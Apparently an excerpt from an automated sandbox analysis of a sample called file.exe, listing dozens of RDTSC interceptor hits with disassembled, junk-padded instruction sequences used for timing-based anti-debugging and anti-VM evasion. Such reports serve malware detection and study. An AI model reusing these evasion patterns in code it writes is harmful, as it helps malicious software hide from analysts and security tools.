Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A6A second address: 751A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A70 second address: 751A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A75 second address: 751A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A7B second address: 751A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752984 second address: 752A16 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618476h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FCA94618471h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FCA94618468h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c add ebx, dword ptr [ebp+122D36A0h] 0x00000032 push 00000000h 0x00000034 mov ebx, eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FCA94618468h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 sub edi, 278B471Fh 0x00000058 push eax 0x00000059 push edi 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FCA94618473h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7548C0 second address: 7548CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751C36 second address: 751CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FCA94618468h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 jno 00007FCA9461846Ch 0x0000002b push dword ptr fs:[00000000h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FCA94618468h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c xor bx, CEABh 0x00000051 mov dword ptr fs:[00000000h], esp 0x00000058 mov edi, dword ptr [ebp+122D18DEh] 0x0000005e mov eax, dword ptr [ebp+122D0929h] 0x00000064 mov edi, dword ptr [ebp+122D3748h] 0x0000006a push FFFFFFFFh 0x0000006c mov di, dx 0x0000006f nop 0x00000070 jmp 00007FCA9461846Eh 0x00000075 push eax 0x00000076 push ebx 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752BBF second address: 752BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753AB4 second address: 753ABE instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA9461846Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7549E4 second address: 754A0A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCA94C93E49h 0x00000008 jmp 00007FCA94C93E43h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752BC3 second address: 752BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753ABE second address: 753B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx ebx, ax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FCA94C93E38h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D35FEh], edx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a jmp 00007FCA94C93E3Fh 0x0000003f mov eax, dword ptr [ebp+122D0A2Dh] 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007FCA94C93E38h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f jno 00007FCA94C93E37h 0x00000065 mov bx, FDB2h 0x00000069 push FFFFFFFFh 0x0000006b xor dword ptr [ebp+122D31ADh], esi 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FCA94C93E48h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75663A second address: 75663F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 754A0A second address: 754A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752BC9 second address: 752BD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FCA94618466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7566D6 second address: 7566E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCA94C93E36h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752BD4 second address: 752C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bl, A9h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov ebx, dword ptr [ebp+12475B95h] 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e or edi, 046BF531h 0x00000024 mov eax, dword ptr [ebp+122D0619h] 0x0000002a sub edi, 2FA68224h 0x00000030 push FFFFFFFFh 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007FCA94618468h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c and edi, 50A68970h 0x00000052 mov ebx, dword ptr [ebp+122D374Ch] 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jo 00007FCA9461846Ch 0x00000061 jp 00007FCA94618466h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 756817 second address: 75682A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCA94C93E36h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75789C second address: 7578A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75682A second address: 756830 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 756830 second address: 75683A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7578A0 second address: 757936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bx, 7705h 0x00000017 mov edi, 46D47A92h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 sub dword ptr [ebp+122D1AE6h], eax 0x00000029 pushad 0x0000002a jmp 00007FCA94C93E47h 0x0000002f jbe 00007FCA94C93E38h 0x00000035 popad 0x00000036 mov eax, dword ptr [ebp+122D0F15h] 0x0000003c jne 00007FCA94C93E3Ch 0x00000042 push FFFFFFFFh 0x00000044 mov ebx, dword ptr [ebp+122D39B0h] 0x0000004a pushad 0x0000004b ja 00007FCA94C93E38h 0x00000051 mov ecx, ebx 0x00000053 sub al, 00000003h 0x00000056 popad 0x00000057 nop 0x00000058 pushad 0x00000059 push edi 0x0000005a pushad 0x0000005b popad 0x0000005c pop edi 0x0000005d pushad 0x0000005e push edi 0x0000005f pop edi 0x00000060 push edx 0x00000061 pop edx 0x00000062 popad 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 jnc 00007FCA94C93E36h 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75A61C second address: 75A638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94618478h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757936 second address: 75793B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D78A second address: 75D791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C94E second address: 75C954 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D791 second address: 75D7F6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCA9461846Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D1D59h], edx 0x00000013 mov ebx, dword ptr [ebp+122D1B00h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d mov di, ax 0x00000020 call 00007FCA94618470h 0x00000025 call 00007FCA94618477h 0x0000002a pop ebx 0x0000002b pop ebx 0x0000002c xchg eax, esi 0x0000002d jnc 00007FCA94618470h 0x00000033 push eax 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C954 second address: 75C96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94C93E47h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D7F6 second address: 75D801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D801 second address: 75D805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75E8D8 second address: 75E8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCA94618466h 0x0000000a popad 0x0000000b jnp 00007FCA9461846Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75F8EB second address: 75F90D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007FCA94C93E36h 0x00000014 jmp 00007FCA94C93E3Dh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75EA5E second address: 75EA64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766B1D second address: 766B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FCA94C93E36h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766B2A second address: 766B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FCA94618476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70E260 second address: 70E2AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA94C93E3Dh 0x0000000b jmp 00007FCA94C93E40h 0x00000010 popad 0x00000011 js 00007FCA94C93E62h 0x00000017 push edi 0x00000018 jg 00007FCA94C93E36h 0x0000001e jmp 00007FCA94C93E46h 0x00000023 pop edi 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 769FFD second address: 76A008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCA94618466h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A1B2 second address: 76A1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCA94C93E36h 0x0000000a jmp 00007FCA94C93E49h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A1DC second address: 76A1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A360 second address: 76A365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A4E9 second address: 76A4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A4EF second address: 76A500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 ja 00007FCA94C93E3Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A500 second address: 76A51F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Eh 0x00000007 push edx 0x00000008 jnc 00007FCA94618466h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A51F second address: 76A523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A523 second address: 76A527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 771F3F second address: 771F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 771F43 second address: 771F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FCA9461846Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 771F60 second address: 771F70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77204D second address: 772052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772052 second address: 772076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCA94C93E47h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772076 second address: 772093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FCA94618466h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772093 second address: 7720A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7720A3 second address: 7720A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7720A7 second address: 7720AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7720AB second address: 7720D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FCA94618473h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jo 00007FCA94618470h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77582D second address: 77584A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCA94C93E44h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 775FBE second address: 775FC3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776127 second address: 77612B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776391 second address: 776395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776395 second address: 7763AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FCA94C93E38h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BE24 second address: 77BE33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BE33 second address: 77BE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FCA94C93E3Fh 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f jo 00007FCA94C93E83h 0x00000015 pushad 0x00000016 jc 00007FCA94C93E36h 0x0000001c jno 00007FCA94C93E36h 0x00000022 jmp 00007FCA94C93E3Dh 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FCA94C93E46h 0x0000002f push esi 0x00000030 pop esi 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 705C5F second address: 705C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 705C64 second address: 705C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007FCA94C93E36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 705C72 second address: 705C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FCA94618466h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AEDF second address: 77AEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AEE7 second address: 77AEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AEEB second address: 77AEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AEF4 second address: 77AEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AEFF second address: 77AF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B2DC second address: 77B2E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B2E2 second address: 77B2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B2E8 second address: 77B2EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A987 second address: 77A990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B5B7 second address: 77B5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B5BB second address: 77B5C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007FCA94C93E36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BB5B second address: 77BB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BB65 second address: 77BB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FCA94C93E36h 0x0000000a jbe 00007FCA94C93E36h 0x00000010 jp 00007FCA94C93E36h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BB7F second address: 77BB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA9461846Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78431C second address: 784323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70272C second address: 702730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 702730 second address: 702734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
